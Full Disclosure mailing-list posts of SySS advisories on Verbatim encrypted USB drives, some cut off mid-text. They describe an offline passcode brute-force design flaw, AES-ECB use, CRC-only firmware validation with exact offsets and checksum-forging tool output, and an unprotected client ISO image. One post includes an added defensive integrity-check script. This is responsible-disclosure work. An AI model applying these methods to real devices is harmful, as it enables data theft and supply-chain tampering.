2020-12-03: Manufacturer confirms reproducing the security issue in both
the Windows and the Linux client and asks further questions
2020-12-04: SySS answers open questions
2020-12-04: Manufacturer responds and will look into the reported
security issue
2021-01-21: SySS asks for status update
2021-02-01: SySS asks for status update
2021-03-18: Public release of security advisory



References:

[1] Product Website for Zoom
https://zoom.us/
[2] SySS Security Advisory SYSS-2020-044
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-044.txt
[3] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy
[4] GitHub Website of SimpleScreenRecorder
https://github.com/MaartenBaert/ssr/
[5] SySS Proof of Concept Video: Zoom U

[FD] [SYSS-2022-001]: Verbatim Keypad Secure USB 3.2 Gen 1 Drive - Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) (CVE-2022-28384)

2022-06-11 Thread Matthias Deeg

Advisory ID: SYSS-2022-001
Product: Keypad Secure USB 3.2 Gen 1 Drive
Manufacturer: Verbatim
Affected Version(s): Part Number #49428
Tested Version(s): Part Number #49428
Vulnerability Type: Use of a Cryptographic Primitive with a Risky
Implementation (CWE-1240)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2022-01-27
Solution Date: -
Public Disclosure: 2022-06-08
CVE Reference: CVE-2022-28384
Author of Advisory: Matthias Deeg (SySS GmbH)



Overview:

The Verbatim Keypad Secure is a USB drive with AES 256-bit hardware
encryption and a built-in keypad for passcode entry.

The manufacturer describes the product as follows:

"The AES 256-bit Hardware Encryption seamlessly encrypts all data on the
drive in real-time with a built-in keypad for passcode input. The USB
Drive does not store passwords in the computer or system's volatile
memory making it far more secure than software encryption. Also, if it
falls into the wrong hands, the device will lock and require
re-formatting after 20 failed passcode attempts."[1]

Due to an insecure design, the Verbatim Keypad Secure USB drive is
vulnerable to an offline brute-force attack for finding out the correct
passcode, and thus gaining unauthorized access to the stored encrypted
data.



Vulnerability Details:

When analyzing the USB drive Verbatim Keypad Secure, Matthias Deeg found
out it uses an insecure design which allows for offline brute-force
attacks against the passcode.

The Verbatim Keypad Secure consists of the following four main parts:

1. An SSD in M.2 form factor (SSD controller MARVELL-88NV1120)
2. A USB-to-SATA bridge controller (INIC-3637EN)
3. An SPI flash memory chip (XT25F01D) containing the firmware of the
   INIC-3637EN
4. A keypad controller (unknown chip, marked "SW611 2121")

For encrypting the data stored on the SSD, the hardware AES engine of
the INIC-3637EN is used. More specifically, AES-256 in ECB (Electronic
Codebook) mode is used for data encryption, which is also a security
issue by itself described in SySS security advisory SYSS-2022-002[2].

The cryptographic key for the actual data encryption, the so-called data
encryption key (DEK), is stored in a special sector of the SSD which in
turn is encrypted using AES-256-ECB with a so-called key encryption key
(KEK).

This KEK is derived by the keypad controller from the entered passcode,
which can be between five and twelve digits long.

When the unlock button is pressed on the Verbatim Keypad Secure, this
generated AES 256-bit key is transmitted via SPI communication from the
keypad controller to the USB-to-SATA bridge controller INIC-3637EN for
configuring the corresponding hardware AES engine.

For verifying the entered passcode, the firmware of the INIC-3637EN
reads and decrypts the special sector on the SSD with the provided KEK,
and checks specific data offsets for the known byte pattern (signature)
"0x20 0x49 0x4E 0x49" which represents the string " INI".

If this byte pattern could successfully be found, the entered passcode
and its derived AES key are very likely correct, and enable the firmware
access to the decrypted DEK which can then be used to decrypt the
actual SSD user data.

This described design of the Verbatim Keypad Secure allows for offline
brute-force attacks for finding the correct passcode, because an
attacker can generate and observe the derived AES keys (KEK) of the
keypad for all possible passcodes, and then try to correctly decrypt the
data of the specific SSD sector. If the magic byte pattern " INI" can be
found in the expected places of the resulting plaintext, the correct
passcode was found, which then allows for gaining unauthorized access to
the encrypted user data.



Proof of Concept (PoC):

For demonstrating the offline brute-force attack, Matthias Deeg
developed a sample brute-forcing software tool which checks the complete
search space of all possible passcodes between five and twelve digits.



Solution:

SySS GmbH is not aware of a solution for the described security issue.



Disclosure Timeline:

2022-01-27: Vulnerability reported to manufacturer
2022-02-11: Vulnerability reported to manufacturer again
2022-03-07: Vulnerability reported to manufacturer again
2022-06-08: Public release of security advisory



References:

[1] Product website for Verbatim Keypad Secure

https:/

[FD] [SYSS-2022-005]: Verbatim Store 'n' Go Secure Portable HDD - Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) (CVE-2022-28384)

2022-06-11 Thread Matthias Deeg

Advisory ID: SYSS-2022-005
Product: Store 'n' Go Secure Portable HDD
Manufacturer: Verbatim
Affected Version(s): GD25LK01-3637-C VER4.0
Tested Version(s): GD25LK01-3637-C VER4.0
Vulnerability Type: Use of a Cryptographic Primitive with a Risky
Implementation (CWE-1240)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2022-01-31
Solution Date: -
Public Disclosure: 2022-06-08
CVE Reference: CVE-2022-28384
Author of Advisory: Matthias Deeg (SySS GmbH)



Overview:

The Verbatim Store 'n' Go Secure Portable HDD is a portable USB drive
with AES 256-bit hardware encryption and a built-in keypad for passcode
entry.

The manufacturer describes the product as follows:

"The AES 256-bit Hardware Encryption seamlessly encrypts all data on the
drive in real-time with a built-in keypad for password input. The SSD
does not store passwords in the computer or system's volatile memory
making it far more secure than software encryption. Also, if it falls
into the wrong hands, the SSD will lock and require re-formatting after
20 failed password attempts." [1]

Due to an insecure design, the Verbatim Store 'n' Go Secure Portable HDD
is vulnerable to an offline brute-force attack for finding out the
correct passcode, and thus gaining unauthorized access to the stored
encrypted data.



Vulnerability Details:

When analyzing the external SSD Verbatim Store 'n' Go Secure Portable
HDD, Matthias Deeg found out it uses an insecure design which allows for
offline brute-force attacks against the passcode.

The device consists of the following four main parts:

1. a Toshiba SSD (MQ04ABF100)
2. a USB-to-SATA bridge controller (INIC-3637EN)
3. an SPI flash memory chip (XT25F01D) containing the firmware of the
   INIC-3637EN
4. a keypad controller (unknown chip, marked "SW611 2121")

For encrypting the data stored on the SSD, the hardware AES engine of
the INIC-3637EN is used. More specifically, AES-256 in ECB (Electronic
Codebook) mode is used for data encryption, which is also a security
issue by itself described in SySS security advisory SYSS-2022-002 [2].

The cryptographic key for the actual data encryption, the so-called data
encryption key (DEK), is stored in a special sector of the SSD which in
turn is encrypted using AES-256-ECB with a so-called key encryption key
(KEK).

This KEK is derived by the keypad controller from the entered passcode,
which can be between five and twelve digits long.

When the unlock button is pressed on the Verbatim Store 'n' Go Secure
Portable HDD, this generated AES 256-bit key is transmitted via SPI
communication from the keypad controller to the USB-to-SATA bridge
controller INIC-3637EN for configuring the corresponding hardware AES
engine.

For verifying the entered passcode, the firmware of the INIC-3637EN
reads and decrypts the special sector on the SSD with the provided KEK,
and checks specific data offsets for the known byte pattern (signature)
"0x20 0x49 0x4E 0x49" which represents the string " INI".

If this byte pattern could successfully be found, the entered passcode
and its derived AES key are very likely correct, and enable the firmware
access to the decrypted DEK, which can then be used to decrypt the
actual SSD user data.

This described design of the Verbatim Store 'n' Go Secure Portable HDD
allows for offline brute-force attacks for finding the correct passcode,
because an attacker can generate and observe the derived AES keys (KEK)
of the keypad for all possible passcodes, and then try to correctly
decrypt the data of the specific SSD sector. If the magic byte pattern
" INI" can be found in the expected places of the resulting plaintext,
the correct passcode was found, which then allows for gaining
unauthorized access to the encrypted user data.



Proof of Concept (PoC):

For demonstrating the offline brute-force attack, Matthias Deeg
developed a sample brute-forcing software tool which checks the complete
search space of all possible passcodes between 5 and 12 digits.



Solution:

SySS GmbH is not aware of a solution for the described security issue.



Disclosure Timeline:

2022-01-31: Vulnerability reported to manufacturer
2022-02-11: Vulnerability reported to manufacturer again
2022-03-07: Vulnerability reported to manufacturer again
2022-06-08: Public release of security advisory



References:

[1] Product website fo

[FD] [SYSS-2022-011]: Verbatim Executive Fingerprint Secure SSD - Missing Immutable Root of Trust in Hardware (CWE-1326) (CVE-2022-28383)

2022-06-11 Thread Matthias Deeg

Advisory ID: SYSS-2022-011
Product: Executive Fingerprint Secure SSD
Manufacturer: Verbatim
Affected Version(s): GDMSFE01-INI3637-C VER1.1
Tested Version(s): GDMSFE01-INI3637-C VER1.1
Vulnerability Type: Missing Immutable Root of Trust in Hardware
(CWE-1326)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2022-02-03
Solution Date: -
Public Disclosure: 2022-06-08
CVE Reference: CVE-2022-28383
Author of Advisory: Matthias Deeg (SySS GmbH)



Overview:

The Verbatim Executive Fingerprint Secure SSD is a USB drive with AES
256-bit hardware encryption and a built-in fingerprint sensor for
unlocking the device with previously registered fingerprints.

The manufacturer describes the product as follows:

"The AES 256-bit Hardware Encryption seamlessly encrypts all data on the
drive in real-time. The drive is compliant with GDPR requirements as
100% of the drive is securely encrypted. The built-in fingerprint
recognition system allows access for up to eight authorised users and
one administrator who can access the device via a password. The SSD
does not store passwords in the computer or system's volatile memory
making it far more secure than software encryption."[1]

Due to insufficient firmware validation, an attacker can store
malicious firmware code for the USB-to-SATA bridge controller on the USB
drive, which then gets executed.



Vulnerability Details:

When analyzing the Verbatim Executive Fingerprint Secure SSD, Matthias
Deeg found out that the validation of the firmware for the USB-to-SATA
bridge controller INIC-3637EN only consists of a simple CRC-16 check
(XMODEM CRC-16).

Thus, an attacker is able to store malicious firmware code for the
INIC-3637EN with a correct checksum on the used SPI flash memory chip
(XT25F01D), which then gets successfully executed by the USB-to-SATA
bridge controller.

For instance, this security vulnerability could be exploited in a
so-called "supply chain attack" when the device is still on its way to
its legitimate user.

An attacker with temporary physical access while the device is in the
supply chain could, for example, program a modified firmware onto the
Verbatim Executive Fingerprint Secure SSD which always uses an
attacker-controlled AES key for the data encryption.

If, later on, the attacker gains access to the used USB drive, he can
simply decrypt all contained user data.



Proof of Concept (PoC):

SySS was able to read and write the SPI flash memory containing the
firmware of the INIC-3637EN controller (128 KB) using a universal
programmer.

By analyzing the dumped memory content, SySS found out that the
INIC-3637EN firmware is stored from the file offset 0x4000 to the file
offset 0x1BFFB, and that the corresponding XMODEM CRC-16 is stored at
the file offset 0x1FFFC.

Matthias Deeg developed a simple Python tool for updating the checksum
of modified firmware images before writing them to the SPI flash memory
chip.

The following output exemplarily shows updating a modified firmware
image:

$ python update-firmaware.py firmware_hacked.bin
Verbatim Executive Fingerprint Secure SSD Firmware Updater v0.1 - 
Matthias Deeg, SySS GmbH (c) 2022

[*] Computed CRC-16 (0x7087) does not match stored CRC-16 (0x48EE).
[*] Successfully updated firmware file



Solution:

SySS GmbH is not aware of a solution for the described security issue.



Disclosure Timeline:

2022-02-03: Vulnerability reported to manufacturer
2022-02-11: Vulnerability reported to manufacturer again
2022-03-07: Vulnerability reported to manufacturer again
2022-06-08: Public release of security advisory



References:

[1] Product website for Verbatim Executive Fingerprint Secure SSD

https://www.verbatim-europe.co.uk/en/prod/executive-fingerprint-secure-ssd-usb-32-gen-1--usb-c-1tb-53657/
[2] SySS Security Advisory SYSS-2022-011

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-011.txt
[3] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key: 
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc

Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaim

[FD] [SYSS-2022-015]: Verbatim Fingerprint Secure Portable Hard Drive - Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) (CVE-2022-28382)

2022-06-11 Thread Matthias Deeg

Advisory ID:               SYSS-2022-015
Product:                   Fingerprint Secure Portable Hard Drive
Manufacturer:              Verbatim
Affected Version(s):       #53650
Tested Version(s):         #53650
Vulnerability Type:        Use of a Cryptographic Primitive with a Risky
                           Implementation (CWE-1240)
Risk Level:                Low
Solution Status:           Open
Manufacturer Notification: 2022-02-03
Solution Date:             -
Public Disclosure:         2022-06-08
CVE Reference:             CVE-2022-28382
Author of Advisory:        Matthias Deeg (SySS GmbH)



Overview:

The Verbatim Fingerprint Secure Portable Hard Drive is a USB drive with
AES 256-bit hardware encryption and a built-in fingerprint sensor for
unlocking the device with previously registered fingerprints.

The manufacturer describes the product as follows:

"The AES 256-bit Hardware Encryption seamlessly encrypts all data on the
drive in real-time. The drive is compliant with GDPR requirements as
100% of the drive is securely encrypted. The built-in fingerprint
recognition system allows access for up to eight authorised users and
one administrator who can access the device via a password. The hard
drive does not store passwords in the computer or system's volatile
memory making it far more secure than software encryption."[1]

Due to the use of the insecure AES mode of operation ECB (Electronic
Codebook), an attacker may be able to extract information from encrypted
data, for example by observing repeating byte patterns.



Vulnerability Details:

When analyzing the Verbatim Fingerprint Secure Portable Hard Drive,
Matthias Deeg found out that the firmware of the USB-to-SATA bridge
controller INIC-3637EN uses AES-256 with the ECB (Electronic Codebook)
mode.

In this mode of operation, a block cipher like AES always encrypts
identical plaintext blocks, in this case 16-byte blocks, to identical
ciphertext blocks under the same key.

For some data, for instance bitmap images, this determinism (ECB
provides no diffusion across blocks, so the block structure of the
plaintext is preserved in the ciphertext) can leak sensitive information
even from encrypted data.

One famous example for this is an ECB-encrypted image of the TUX
penguin, which, for instance, is referenced in the Wikipedia article
about block cipher modes of operation[2] to illustrate this issue.

Thus, the use of the ECB operation mode can put the confidentiality of
specific information at risk, even in an encrypted form.

Additionally, in attack scenarios where an attacker has short-time
physical access to a Verbatim Fingerprint Secure Portable Hard Drive
and later returns it to its legitimate owner, the attacker may be able
to compromise the integrity of the stored data without knowing the key:
because identical 16-byte plaintext blocks result in identical 16-byte
ciphertext blocks, specific encrypted 16-byte blocks can be replaced
with other encrypted blocks from the drive.



Proof of Concept (PoC):

The same 16 byte long plaintext pattern was written several times to an
unlocked Verbatim Fingerprint Secure Portable Hard Drive.

When the hard drive was then read using another drive enclosure, the
same 16 byte long ciphertext pattern could be observed for the
corresponding plaintext data.



Solution:

SySS GmbH is not aware of a solution for the described security issue.



Disclosure Timeline:

2022-02-03: Vulnerability reported to manufacturer
2022-02-11: Vulnerability reported to manufacturer again
2022-03-07: Vulnerability reported to manufacturer again
2022-06-08: Public release of security advisory



References:

[1] Product website for Verbatim Fingerprint Secure Portable Hard Drive

https://www.verbatim-europe.co.uk/en/prod/fingerprint-secure-portable-hard-drive-1tb-53650/
[2] Wikipedia article about block cipher mode of operation

https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_codebook_(ECB)
[3] SySS Security Advisory SYSS-2022-015

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-015.txt
[4] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key: 
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc

Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in thi

[FD] [SYSS-2022-017]: Verbatim Fingerprint Secure Portable Hard Drive - Insufficient Verification of Data Authenticity (CWE-345) (CVE-2022-28385)

2022-06-11 Thread Matthias Deeg

Advisory ID:               SYSS-2022-017
Product:                   Fingerprint Secure Portable Hard Drive
Manufacturer:              Verbatim
Affected Version(s):       #53650
Tested Version(s):         #53650
Vulnerability Type:        Insufficient Verification of Data
                           Authenticity (CWE-345)
Risk Level:                Low
Solution Status:           Open
Manufacturer Notification: 2022-02-03
Solution Date:             -
Public Disclosure:         2022-06-08
CVE Reference:             CVE-2022-28385
Author of Advisory:        Matthias Deeg (SySS GmbH)



Overview:

The Verbatim Fingerprint Secure Portable Hard Drive is a USB drive with
AES 256-bit hardware encryption and a built-in fingerprint sensor for
unlocking the device with previously registered fingerprints.

The manufacturer describes the product as follows:

"The AES 256-bit Hardware Encryption seamlessly encrypts all data on the
drive in real-time. The drive is compliant with GDPR requirements as
100% of the drive is securely encrypted. The built-in fingerprint
recognition system allows access for up to eight authorised users and
one administrator who can access the device via a password. The hard
drive does not store passwords in the computer or system's volatile
memory making it far more secure than software encryption."[1]

Due to missing integrity checks, an attacker can manipulate the content
of the emulated CD-ROM drive containing the Windows and macOS client
software.



Vulnerability Details:

When analyzing the Verbatim Fingerprint Secure Portable Hard Drive,
Matthias Deeg found out that the content of the emulated CD-ROM drive
containing the Windows and macOS client software can be manipulated.

The content of this emulated CD-ROM drive is stored as an ISO-9660 image
in the "hidden" sectors of the USB drive, which can only be accessed
using special IOCTL commands or by installing the drive in an external
disk enclosure.

The following output exemplarily shows the content of the ISO-9660
file system:


# mount hidden_sectors.bin /mnt/

# lsd -laR /mnt/
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  .
drwxr-xr-x root root 4.0 KB Fri Jan  7 16:39:47 2022  ..
.r-xr-xr-x root root  70 B  Wed Aug 14 09:20:40 2019  Autorun.inf
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  MAC
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  Windows

/mnt/MAC:
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  .
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  ..
.r-xr-xr-x root root  13 KB Fri Aug  9 09:03:24 2019  setup
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  Source

/mnt/MAC/Source:
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  .
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  ..
.r-xr-xr-x root root 5.9 MB Mon Jul 22 06:22:24 2019  gtk_dylib.tar
.r-xr-xr-x root root 1.0 MB Wed Aug 14 06:25:10 2019  VERBATIM_B0_V1.1.tar

/mnt/Windows:
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  .
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  ..
.r-xr-xr-x root root 5.6 KB Fri Aug  9 10:47:26 2019  English.txt
.r-xr-xr-x root root 6.6 KB Fri Aug  9 10:47:26 2019  French.txt
.r-xr-xr-x root root 6.2 KB Fri Aug  9 10:47:26 2019  German.txt
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  Ico
.r-xr-xr-x root root 6.2 KB Fri Aug  9 10:47:26 2019  Italian.txt
.r-xr-xr-x root root 512 B  Fri Aug  9 10:47:26 2019  license.bin
.r-xr-xr-x root root 160 KB Fri Aug  9 10:47:26 2019  odbccp32.dll
.r-xr-xr-x root root 7.1 KB Fri Aug  9 10:47:26 2019  Spanish.txt
.r-xr-xr-x root root 4.9 MB Wed Aug 14 09:12:49 2019  VerbatimSecure.exe

/mnt/Windows/Ico:
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  .
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  ..
.r-xr-xr-x root root  34 KB Fri Aug  9 10:47:26 2019  Verbatim.ico

By manipulating this ISO-9660 image or replacing it with another one, an
attacker is able to store malicious software on the emulated CD-ROM
drive which then may get executed by an unsuspecting victim when using
the device.

For example, an attacker with temporary physical access while the
device is in the supply chain could program a modified ISO-9660 image
onto the Verbatim Fingerprint Secure Portable Hard Drive containing
client software which always uses an attacker-controlled password for
unlocking the device.

If, later on, the attacker gains access to the used USB drive, he can
simply decrypt all contained user data.

Storing other arbitrary, malicious software is also possible.



Proof of Concept (PoC):

SySS could successfully modify the content of the ISO-9660 image
containing the Windows and macOS software for unlocking and managing the
Verbatim Fingerprint Secure Portable Hard Drive.
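The device performs no integrity check on the ISO-9660 image in its hidden sectors, so the check has to happen on the host. The following Python script is an added example, not SySS's tooling and not Verbatim's client software: it parses the ISO 9660 Primary Volume Descriptor of a raw dump such as the hidden_sectors.bin mounted above, hashes exactly the extent the descriptor declares (so trailing padding in a dump does not change the result), and compares the digest with a known-good value recorded when the drive was received. The descriptor layout is the ISO 9660 standard; the manifest approach, the function names and the constructed sample image are assumptions of this example.

```python
import hashlib
import hmac
import struct

SECTOR = 2048
PVD_SECTOR = 16   # ISO 9660: volume descriptors start at logical sector 16 (offset 0x8000)


def parse_pvd(image: bytes) -> dict:
    """Parse the Primary Volume Descriptor; raise ValueError if it is missing or inconsistent."""
    off = PVD_SECTOR * SECTOR
    pvd = image[off:off + SECTOR]
    if len(pvd) < SECTOR or pvd[0] != 1 or pvd[1:6] != b"CD001":
        raise ValueError("no primary volume descriptor at sector 16")
    # ISO 9660 stores these numbers twice (little-endian, then big-endian); a mismatch
    # means the descriptor was corrupted or edited carelessly
    space_le, = struct.unpack_from("<I", pvd, 80)
    space_be, = struct.unpack_from(">I", pvd, 84)
    bsize_le, = struct.unpack_from("<H", pvd, 128)
    bsize_be, = struct.unpack_from(">H", pvd, 130)
    if space_le != space_be or bsize_le != bsize_be:
        raise ValueError("both-endian fields disagree: descriptor is corrupted")
    return {
        "system_id": pvd[8:40].decode("ascii", "replace").rstrip(),
        "volume_id": pvd[40:72].decode("ascii", "replace").rstrip(),
        "volume_space_size": space_le,      # in logical blocks
        "logical_block_size": bsize_le,
    }


def iso_extent(image: bytes) -> bytes:
    """Exactly the bytes the descriptor claims belong to the file system; anything after
    that in a raw hidden-sector dump is padding and is ignored."""
    info = parse_pvd(image)
    size = info["volume_space_size"] * info["logical_block_size"]
    if size > len(image):
        raise ValueError("descriptor claims more data than the dump contains")
    return image[:size]


def image_digest(image: bytes) -> str:
    return hashlib.sha256(iso_extent(image)).hexdigest()


def matches_manifest(image: bytes, expected_digest: str) -> bool:
    """The host-side integrity check the device itself does not perform."""
    return hmac.compare_digest(image_digest(image), expected_digest)


def make_sample_image(volume_id: str = "TESTVOL", sectors: int = 20, padding: int = 4) -> bytes:
    """Constructed minimal image (not a dump of the real device): system area, a PVD, a
    terminator descriptor, one data sector standing in for a file such as Autorun.inf,
    then padding sectors outside the declared extent."""
    img = bytearray(sectors * SECTOR)
    pvd = bytearray(SECTOR)
    pvd[0], pvd[1:6], pvd[6] = 1, b"CD001", 1
    pvd[8:40] = b"CONSTRUCTED".ljust(32)
    pvd[40:72] = volume_id.encode("ascii").ljust(32)
    struct.pack_into("<I", pvd, 80, sectors)
    struct.pack_into(">I", pvd, 84, sectors)
    struct.pack_into("<H", pvd, 128, SECTOR)
    struct.pack_into(">H", pvd, 130, SECTOR)
    img[PVD_SECTOR * SECTOR:(PVD_SECTOR + 1) * SECTOR] = pvd
    term = bytearray(SECTOR)
    term[0], term[1:6], term[6] = 255, b"CD001", 1   # volume descriptor set terminator
    img[(PVD_SECTOR + 1) * SECTOR:(PVD_SECTOR + 2) * SECTOR] = term
    data = b"[autorun]\r\nopen=setup.exe\r\n"
    img[(PVD_SECTOR + 2) * SECTOR:(PVD_SECTOR + 2) * SECTOR + len(data)] = data
    return bytes(img) + bytes(padding * SECTOR)


if __name__ == "__main__":
    image = make_sample_image()
    print(parse_pvd(image))
    known_good = image_digest(image)          # record this when the drive is received
    tampered = bytearray(image)
    tampered[(PVD_SECTOR + 2) * SECTOR:(PVD_SECTOR + 2) * SECTOR + 4] = b"evil"
    print("pristine:", matches_manifest(image, known_good))
    print("tampered:", matches_manifest(bytes(tampered), known_good))
```

Hashing only the declared extent matters in practice: a dump taken through a different enclosure or a different IOCTL tool may include more trailing sectors than the image itself, and a naive whole-file hash would then produce false alarms.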




[FD] [SYSS-2022-002]: Verbatim Keypad Secure USB 3.2 Gen 1 Drive - Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) (CVE-2022-28382)

2022-06-11 Thread Matthias Deeg

Advisory ID:               SYSS-2022-002
Product:                   Keypad Secure USB 3.2 Gen 1 Drive
Manufacturer:              Verbatim
Affected Version(s):       Part Number #49428
Tested Version(s):         Part Number #49428
Vulnerability Type:        Use of a Cryptographic Primitive with a Risky
                           Implementation (CWE-1240)
Risk Level:                Low
Solution Status:           Open
Manufacturer Notification: 2022-01-27
Solution Date:             -
Public Disclosure:         2022-06-08
CVE Reference:             CVE-2022-28382
Author of Advisory:        Matthias Deeg (SySS GmbH)



Overview:

The Verbatim Keypad Secure is a USB drive with AES 256-bit hardware
encryption and a built-in keypad for passcode entry.

The manufacturer describes the product as follows:

"The AES 256-bit Hardware Encryption seamlessly encrypts all data on the
drive in real-time with a built-in keypad for passcode input. The USB
Drive does not store passwords in the computer or system's volatile
memory making it far more secure than software encryption. Also, if it
falls into the wrong hands, the device will lock and require
re-formatting after 20 failed passcode attempts."[1]

Due to the use of the insecure AES mode of operation ECB (Electronic
Codebook), an attacker may be able to extract information from encrypted
data, for example by observing repeating byte patterns.



Vulnerability Details:

When analyzing the USB drive Verbatim Keypad Secure, Matthias Deeg found
out that the firmware of the USB-to-SATA bridge controller INIC-3637EN
uses AES-256 with the ECB (Electronic Codebook) mode.

In this mode of operation, a block cipher like AES always encrypts
identical plaintext blocks, in this case 16-byte blocks, to identical
ciphertext blocks under the same key.

For some data, for instance bitmap images, this determinism (ECB
provides no diffusion across blocks, so the block structure of the
plaintext is preserved in the ciphertext) can leak sensitive information
even from encrypted data.

One famous example for this is an ECB-encrypted image of the TUX
penguin, which, for instance, is referenced in the Wikipedia article
about block cipher modes of operation[2] to illustrate this issue.

Thus, the use of the ECB operation mode can put the confidentiality of
specific information at risk, even in an encrypted form.

Additionally, in attack scenarios where an attacker has short-time
physical access to a Verbatim Keypad Secure USB drive and later returns
it to its legitimate owner, the attacker may be able to compromise the
integrity of the stored data without knowing the key: because identical
16-byte plaintext blocks result in identical 16-byte ciphertext blocks,
specific encrypted 16-byte blocks can be replaced with other encrypted
blocks from the drive.



Proof of Concept (PoC):

The same 16 byte long plaintext pattern was written several times to an
unlocked Verbatim Keypad Secure USB drive.

When the SSD was then read using another SSD enclosure, the same 16
byte long ciphertext pattern could be observed for the corresponding
plaintext data.



Solution:

SySS GmbH is not aware of a solution for the described security issue.



Disclosure Timeline:

2022-01-27: Vulnerability reported to manufacturer
2022-02-11: Vulnerability reported to manufacturer again
2022-03-07: Vulnerability reported to manufacturer again
2022-06-08: Public release of security advisory



References:

[1] Product website for Verbatim Keypad Secure

https://www.verbatim-europe.co.uk/en/prod/verbatim-keypad-secure-usb-32-gen-1-drive-64gb-49428/#
[2] Wikipedia article about block cipher mode of operation

https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_codebook_(ECB)
[3] SySS Security Advisory SYSS-2022-002

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-002.txt
[4] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key: 
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc

Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of th

[FD] [SYSS-2022-003]: Verbatim Keypad Secure USB 3.2 Gen 1 Drive - Missing Immutable Root of Trust in Hardware (CWE-1326) (CVE-2022-28383)

2022-06-11 Thread Matthias Deeg

Advisory ID:               SYSS-2022-003
Product:                   Keypad Secure USB 3.2 Gen 1 Drive
Manufacturer:              Verbatim
Affected Version(s):       Part Number #49428
Tested Version(s):         Part Number #49428
Vulnerability Type:        Missing Immutable Root of Trust in Hardware
                           (CWE-1326)
Risk Level:                Medium
Solution Status:           Open
Manufacturer Notification: 2022-01-27
Solution Date:             -
Public Disclosure:         2022-06-08
CVE Reference:             CVE-2022-28383
Author of Advisory:        Matthias Deeg (SySS GmbH)



Overview:

The Verbatim Keypad Secure is a USB drive with AES 256-bit hardware
encryption and a built-in keypad for passcode entry.

The manufacturer describes the product as follows:

"The AES 256-bit Hardware Encryption seamlessly encrypts all data on the
drive in real-time with a built-in keypad for passcode input. The USB
Drive does not store passwords in the computer or system's volatile
memory making it far more secure than software encryption. Also, if it
falls into the wrong hands, the device will lock and require
re-formatting after 20 failed passcode attempts."[1]

Due to insufficient firmware validation, an attacker can store
malicious firmware code for the USB-to-SATA bridge controller on the USB
drive which gets executed.



Vulnerability Details:

When analyzing the USB drive Verbatim Keypad Secure, Matthias Deeg found
out that the validation of the firmware for the USB-to-SATA bridge
controller INIC-3637EN only consists of a simple CRC-16 check (XMODEM
CRC-16).

Thus, an attacker is able to store malicious firmware code for the
INIC-3637EN with a correct checksum on the used SPI flash memory chip
(XT25F01D), which then gets successfully executed by the USB-to-SATA
bridge controller.

For instance, this security vulnerability could be exploited in a
so-called "supply chain attack" when the device is still on its way to
its legitimate user.

An attacker with temporary physical access while the device is in the
supply chain could, for example, program a modified firmware onto the
Verbatim Keypad Secure which always uses an attacker-controlled AES key
for the data encryption.

If, later on, the attacker gains access to the used USB drive, he
can simply decrypt all contained user data.



Proof of Concept (PoC):

SySS was able to read and write the SPI flash memory containing the
firmware of the INIC-3637EN controller (128 KB) using a universal
programmer.

By analyzing the dumped memory content, SySS found out that the
INIC-3637EN firmware is stored from the file offset 0x4000 to the file
offset 0x1BFFB, and that the corresponding XMODEM CRC-16 is stored at
the file offset 0x1FFFC.

Matthias Deeg developed a simple Python tool for updating the checksum
of modified firmware images before writing them to the SPI flash memory
chip.

The following output exemplarily shows updating a modified firmware
image:

$ python update-firmaware.py firmware_hacked.bin
Verbatim Secure Keypad Firmware Updater v0.1 - Matthias Deeg, SySS GmbH 
(c) 2022

[*] Computed CRC-16 (0x03F5) does not match stored CRC-16 (0x8B17).
[*] Successfully updated firmware file



Solution:

SySS GmbH is not aware of a solution for the described security issue.



Disclosure Timeline:

